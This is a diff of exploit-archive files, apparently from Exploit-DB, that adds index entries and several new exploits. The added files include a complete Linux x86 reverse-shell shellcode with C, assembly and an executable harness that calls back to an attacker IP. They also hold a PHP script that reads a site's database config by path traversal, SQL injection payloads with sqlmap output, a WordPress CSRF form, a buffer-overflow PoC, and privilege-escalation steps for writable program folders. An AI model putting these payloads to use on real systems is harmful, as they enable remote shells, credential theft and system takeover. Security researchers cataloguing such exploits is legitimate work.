39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
39574,platforms/windows/local/39574.cs,"Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
@ -35810,7 +35810,7 @@ id,file,description,date,author,platform,type,port
39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80
39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
39595,platforms/multiple/local/39595.txt,"OS X / iOS - Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
@ -35910,7 +35910,7 @@ id,file,description,date,author,platform,type,port
39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80
39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80
39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
@ -35940,7 +35940,7 @@ id,file,description,date,author,platform,type,port
39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080
39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager <= 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0
39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0
39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
39741,platforms/osx/local/39741.txt,"Mach Race OS X - Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0
39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0
39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80
@ -36047,7 +36047,7 @@ id,file,description,date,author,platform,type,port
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80
@ -36068,7 +36068,7 @@ id,file,description,date,author,platform,type,port
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
@ -36246,3 +36246,12 @@ id,file,description,date,author,platform,type,port
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF",2016-07-08,"Persian Hack Team",php,webapps,80
40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
40074,platforms/windows/dos/40074.txt,"Microsoft WinDbg logviewer.exe - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
40075,platforms/lin_x86/shellcode/40075.c,"Linux x86 TCP Reverse Shellcode - 75 bytes",2016-07-08,sajith,lin_x86,shellcode,0
40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80
40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,177 @@
/*
# Linux x86 TCP Reverse Shellcode (75 bytes)
# Author: sajith
# Tested on: i686 GNU/Linux
# Shellcode Length: 75
# SLAE - 750
------------c prog ---poc by sajith shetty----------
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(void)
{
int sock_file_des;
struct sockaddr_in sock_ad;
//[1] create socket connection
//Man page: socket(int domain, int type, int protocol);
sock_file_des = socket(AF_INET, SOCK_STREAM, 0);
//[2]connect back to attacker machine (ip= 192.168.227.129)
//Man page: int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
sock_ad.sin_family = AF_INET;
sock_ad.sin_port = htons(4444);
sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
//[3]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2
//Man page: int dup2(int oldfd, int newfd);
dup2(sock_file_des, 0); // stdin
dup2(sock_file_des, 1); // stdout
dup2(sock_file_des, 2); // stderr
//[4]Execute shell (here we use /bin/sh) using execve call
//[*]Man page for execve call
//int execve(const char *filename, char *const argv[],char *const envp[]);
execve("/bin/sh", 0, 0);
}
----------------------end of c program--------------
global _start
section .text
_start:
;[1] create socket connection
;Man page: socket(int domain, int type, int protocol);
;sock_file_des = socket(2,1,0)
xor edx, edx
push 0x66 ; socket call(0x66)
pop eax
push edx ; protocol = 0
inc edx
push edx ; sock_stream = 1
mov ebx, edx ; EBX =1
inc edx
push edx ; AF_INET =2
mov ecx, esp ; save the pointer to args in ecx register
int 0x80 ; call socketcall()
; int dup2(int oldfd, int newfd);
mov ebx, eax ; store sock_file_des in ebx register
mov ecx, edx ; counter = 2
loop:
mov al, 0x3f
int 0x80
dec ecx
jns loop
; sock_ad.sin_family = AF_INET;
;sock_ad.sin_port = htons(4444);
;sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
;connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
xchg ebx, edx ; before xchg edx=2 and ebx=sock_file_des and after xchg ebx=2, edx=sock_file_des
push 0x81e3a8c0 ; sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
push word 0x5C11 ; sock_ad.sin_port = htons(4444);
push word bx ; sock_ad.sin_family = AF_INET =2;
mov ecx, esp ; pointer to struct
mov al, 0x66 ; socket call (0x66)
inc ebx ; connect (3)
push 0x10 ; sizeof(struct sockaddr_in)
push ecx ; &serv_addr
push edx ; sock_file_des
mov ecx, esp ; save the pointer to args in ecx register
int 0x80
mov al, 11 ; execve system call
cdq ; overwriting edx with either 0 (if eax is positive)
push edx ; push null
push 0x68732f6e ; hs/b
push 0x69622f2f ; ib//
mov ebx,esp ; save pointer
push edx ; push null
push ebx ; push pointer
mov ecx,esp ; save pointer
int 0x80
-------------obj dump------------
rev_shell1: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 d2 xor edx,edx
8048062: 6a 66 push 0x66
8048064: 58 pop eax
8048065: 52 push edx
8048066: 42 inc edx
8048067: 52 push edx
8048068: 89 d3 mov ebx,edx
804806a: 42 inc edx
804806b: 52 push edx
804806c: 89 e1 mov ecx,esp
804806e: cd 80 int 0x80
8048070: 89 c3 mov ebx,eax
8048072: 89 d1 mov ecx,edx
08048074 <loop>:
8048074: b0 3f mov al,0x3f
8048076: cd 80 int 0x80
8048078: 49 dec ecx
8048079: 79 f9 jns 8048074 <loop>
804807b: 87 da xchg edx,ebx
804807d: 68 c0 a8 e3 81 push 0x81e3a8c0
8048082: 66 68 11 5c pushw 0x5c11
8048086: 66 53 push bx
8048088: 89 e1 mov ecx,esp
804808a: b0 66 mov al,0x66
804808c: 43 inc ebx
804808d: 6a 10 push 0x10
804808f: 51 push ecx
8048090: 52 push edx
8048091: 89 e1 mov ecx,esp
8048093: cd 80 int 0x80
8048095: b0 0b mov al,0xb
8048097: 99 cdq
8048098: 52 push edx
8048099: 68 6e 2f 73 68 push 0x68732f6e
804809e: 68 2f 2f 62 69 push 0x69622f2f
80480a3: 89 e3 mov ebx,esp
80480a5: 52 push edx
80480a6: 53 push ebx
80480a7: 89 e1 mov ecx,esp
80480a9: cd 80 int 0x80
-----------------------------------------------
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xd2\x6a\x66\x58\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68"
"\xc0\xa8\xe3\x81" //IP address 192.168.227.129
"\x66\x68"
"\x11\x5c" // port 4444
"\x66\x53\x89\xe1\xb0\x66\x43\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

30
platforms/php/webapps/40070.txt Executable file
View file

@ -0,0 +1,30 @@
######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is
<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>
#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################

35
platforms/php/webapps/40076.php Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: php Real Estate Script Arbitrary File Disclosure
# Date: 2016-07-08
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.realestatescript.eu/
# Version: v.3
# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip
Exploit :
<?php
//read db config file
$post_data = 'tpl=../../private/config/db.php';//change read file path
$host = "www.server.local";//change victim address
$socket = fsockopen($host, 80, $errno, $errstr, 15);
if(!$socket){
echo ' error: ' . $errno . ' ' . $errstr;
die;
}else{
//change [demo/en] path server
$path = "/demo/en/";
$http = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
$http .= "Host: $host\r\n";
$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$http .= "Content-length: " . strlen($post_data) . "\r\n";
$http .= "Connection: close\r\n\r\n";
$http .= $post_data . "\r\n\r\n";
fwrite($socket, $http);
$contents = "";
while (!feof($socket)) {
$contents .= fgets($socket, 4096);
}
fclose($socket);
$e = explode('Content-Type: text/html',$contents);
print $e[1];
}
?>

55
platforms/php/webapps/40078.txt Executable file
View file

@ -0,0 +1,55 @@
######################
# Application Name : Streamo - Online Radio And Tv Streaming CMS
# Google Dork : inurl:rjdetails.php?id=
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://rexbd.net/
# Vulnerable Type : SQL Injection
# Date : 2016-07-08
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/menu.php
http://localhost/[path]/programs.php
http://localhost/[path]/rjdetails.php
######################
# Vulnerable code :
$gid = $_GET["id"];
######################
# PoC Exploit:
http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY
---
######################

99
platforms/windows/dos/40073.py Executable file
View file

@ -0,0 +1,99 @@
'''
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
=========================================
Microsoft Process Kill Utility "kill.exe"
File version: 6.3.9600.17298
The Kill tool (kill.exe), a tool used to terminate a process, part of the
WinDbg program.
Vulnerability Type:
===================
Buffer Overflow
SEH Buffer Overflow @ about 512 bytes
Vulnerability Details:
=====================
Register dump
'SEH chain of main thread
Address SE handler
001AF688 kernel32.756F489B
001AFBD8 52525252
42424242 *** CORRUPT ENTRY ***
001BF81C 41414141 AAAA
001BF820 41414141 AAAA
001BF824 41414141 AAAA
001BF828 41414141 AAAA
001BF82C 41414141 AAAA
001BF830 41414141 AAAA
001BF834 909006EB ë Pointer to next SEH record
001BF838 52525252 RRRR SE handler <================
001BF83C 90909090
001BF840 90909090
Exploit code(s):
================
Python POC.
'''
junk="A"*508+"RRRR"
pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
subprocess.Popen([pgm, junk], shell=False)
'''
Disclosure Timeline:
==================================
Vendor Notification: June 24, 2016
Vendor reply: Will not security service
July 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
'''

230
platforms/windows/dos/40074.txt Executable file
View file

@ -0,0 +1,230 @@
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
====================
WinDbg logviewer.exe
LogViewer (logviewer.exe), a tool that displays the logs created, part of
WinDbg application.
Vulnerability Type:
===================
Buffer Overflow DOS
Vulnerability Details:
=====================
Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv
files. App crash then Overwrite of MMX registers etc...
this utility belongs to Windows Kits/8.1/Debuggers/x86
Read Access Violation / Memory Corruption
Win32 API Log Viewer
6.3.9600.17298
Windbg x86
logviewer.exe
Log Viewer 3.01 for x86
(5fb8.32fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\syswow64\msvcrt.dll -
eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000
edi=013dcd30
eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210206
msvcrt!memmove+0x1ee:
754fa048 660f6f06 movdqa xmm0,xmmword ptr [esi]
ds:002b:005d2000=????????????????????????????????
gs 2b
fs 53
es 2b
ds 2b
edi 136cd30
esi 7d2000
ebx 7d0000
edx 0
ecx 41
eax 136ad30
ebp df750
eip 754fa048
cs 23
efl 210206
esp df748
ss 2b
dr0 0
dr1 0
dr2 0
dr3 0
dr6 0
dr7 0
di cd30
si 2000
bx 0
dx 0
cx 41
ax ad30
bp f750
ip a048
fl 206
sp f748
bl 0
dl 0
cl 41
al 30
bh 0
dh 0
ch 0
ah ad
fpcw 27f
fpsw 4020
fptw ffff
fopcode 0
fpip 76454c1e
fpipsel 23
fpdp 6aec2c
fpdpsel 2b
st0 -1.00000000000000e+000
st1 -1.00000000000000e+000
st2 -1.00000000000000e+000
st3 9.60000000000000e+001
st4 1.08506945252884e-004
st5 -1.00000000000000e+000
st6 0.00000000000000e+000
st7 0.00000000000000e+000
mm0 0:2:2:2
mm1 0:0:2:202
mm2 0:1:1:1
mm3 c000:0:0:0
mm4 e38e:3900:0:0
mm5 0:0:0:0
mm6 0:0:0:0
mm7 0:0:0:0
mxcsr 1fa0
xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
iopl 0
of 0
df 0
if 1
tf 0
sf 0
zf 0
af 0
pf 1
cf 0
vip 0
vif 0
xmm0l 4141:4141:4141:4141
xmm1l 4141:4141:4141:4141
xmm2l 4141:4141:4141:4141
xmm3l 4141:4141:4141:4141
xmm4l 4141:4141:4141:4141
xmm5l 4141:4141:4141:4141
xmm6l 4141:4141:4141:4141
xmm7l 4141:4141:4141:4141
xmm0h 4141:4141:4141:4141
xmm1h 4141:4141:4141:4141
xmm2h 4141:4141:4141:4141
xmm3h 4141:4141:4141:4141
xmm4h 4141:4141:4141:4141
xmm5h 4141:4141:4141:4141
xmm6h 4141:4141:4141:4141
xmm7h 4141:4141:4141:4141
xmm0/0 41414141
xmm0/1 41414141
xmm0/2 41414141
xmm0/3 41414141
xmm1/0 41414141
xmm1/1 41414141
xmm1/2 41414141
xmm1/3 41414141
xmm2/0 41414141
xmm2/1 41414141
xmm2/2 41414141
xmm2/3 41414141
xmm3/0 41414141
xmm3/1 41414141
xmm3/2 41414141
xmm3/3 41414141
xmm4/0 41414141
xmm4/1 41414141
xmm4/2 41414141
xmm4/3 41414141
xmm5/0 41414141
xmm5/1 41414141
xmm5/2 41414141
xmm5/3 41414141
xmm6/0 41414141
xmm6/1 41414141
xmm6/2 41414141
xmm6/3 41414141
xmm7/0 41414141
xmm7/1 41414141
xmm7/2 41414141
xmm7/3 41414141
Exploit code(s):
===============
1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM
registers, ECX etc
2) run from command line pipe the file to it to watch it crash and burn.
///////////////////////////////////////////////////////////////////////
Disclosure Timeline:
===============================
Vendor Notification: June 23, 2016
Vendor acknowledged: July 1, 2016
Vendor reply: Will not fix (stability issue)
July 8, 2016 : Public Disclosure
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX

View file

@ -0,0 +1,72 @@
Title: Hide.Me VPN Client - EoP: User to SYSTEM
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: eVenture
Product: Hide.Me VPN Client
Version: 1.2.4
Download link: https://hide.me/en/software/windows
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release
Installer Name: Hide.me-Setup-1.2.4.exe
MD5: e5e5e2fa2c9592660a180357c4482740
SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034
- 1. Introduction: -
The installer automatically creates a folder named "hide.me VPN" under
c:\program files\ for the software.
No other location can be specified during installation.
The folder has insecure permissions allowing EVERYONE the WRITE permission.
Users can replace binaries or plant malicious DLLs to obtain elevated privileges.
As the software is running one executable as service under SYSTEM
permissions an attacker could elevate from regular user to SYSTEM.
- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt to specify an installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe
Example:
C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C. A user can overwrite an executable or drop a malicious DLL to obtain code execution.
The highest permissions are reached by overwriting the service executable: vpnsvc.exe
However it is running at startup and can't be stopped by a non-privileged user.
As we can write to the directory we can rename all of the DLL's to DLL.old
C:\Program Files\hide.me VPN\Common.dll
C:\Program Files\hide.me VPN\SharpRaven.dll
C:\Program Files\hide.me VPN\ComLib.dll
C:\Program Files\hide.me VPN\vpnlib.dll
C:\Program Files\hide.me VPN\Newtonsoft.Json.dll
C:\Program Files\hide.me VPN\DotRas.dll
Once renamed, reboot the machine, log on as normal user.
E. Observe both application AND the system service have crashed.
Now replace vpnsvc.exe with a malicious copy.
Place back all original DLLS and reboot.
Our code will get executed under elevated permissions: SYSTEM.
- 3. Mitigation: -
A. set appropriate permissions on the application folder.
- 4. Author: -
sh4d0wman

View file

@ -0,0 +1,56 @@
Title: InstantHMI - EoP: User to ADMIN
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: Software Horizons
Product: InstantHMI
Version: 6.1
Download link: http://www.instanthmi.com/ihmisoftware.htm
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release
Installer Name: IHMI61-PCInstall-Unicode.exe
MD5: ee3ca3181c51387d89de19e89aea0b31
SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f
- 1. Introduction: -
During a standard installation (default option) the installer
automatically creates a folder named "IHMI-6" in the root drive.
No other location can be specified during standard installation.
As this folder receives default permissions AUTHENTICATED USERS
are given the WRITE permission.
Because of this they can replace binaries or plant malicious
DLLs to obtain elevated, administrative level, privileges.
- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt for the installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe
Example:
IHMI-6 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
D. Change the main executable: InstantHMI.exe with a malicious copy.
E. Once executed by an administrator our code will run
under administrator level privileges.
- 3. Mitigation: -
A. Install under "c:\program files" or "C:\Program Files (x86)"
B. set appropriate permissions on the application folder.
- 4. Author: -
sh4d0wman

135
platforms/xml/webapps/40077.txt Executable file
View file

@ -0,0 +1,135 @@
CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval
Vendor: CyberPower Systems, Inc.
Product web page: https://www.cyberpowersystems.com
Affected version: 3.1.2 (37567) Business Edition
Summary: The PowerPanel® Business Edition software from
CyberPower provides IT professionals with the tools they
need to easily monitor and manage their backup power.
Available for compatible CyberPower UPS models, this
software supports up to 250 clients, allowing users remote
access (from any network PC with a web browser) to instantly
access vital UPS battery conditions, load levels, and runtime
information. Functionality includes application/OS shutdown,
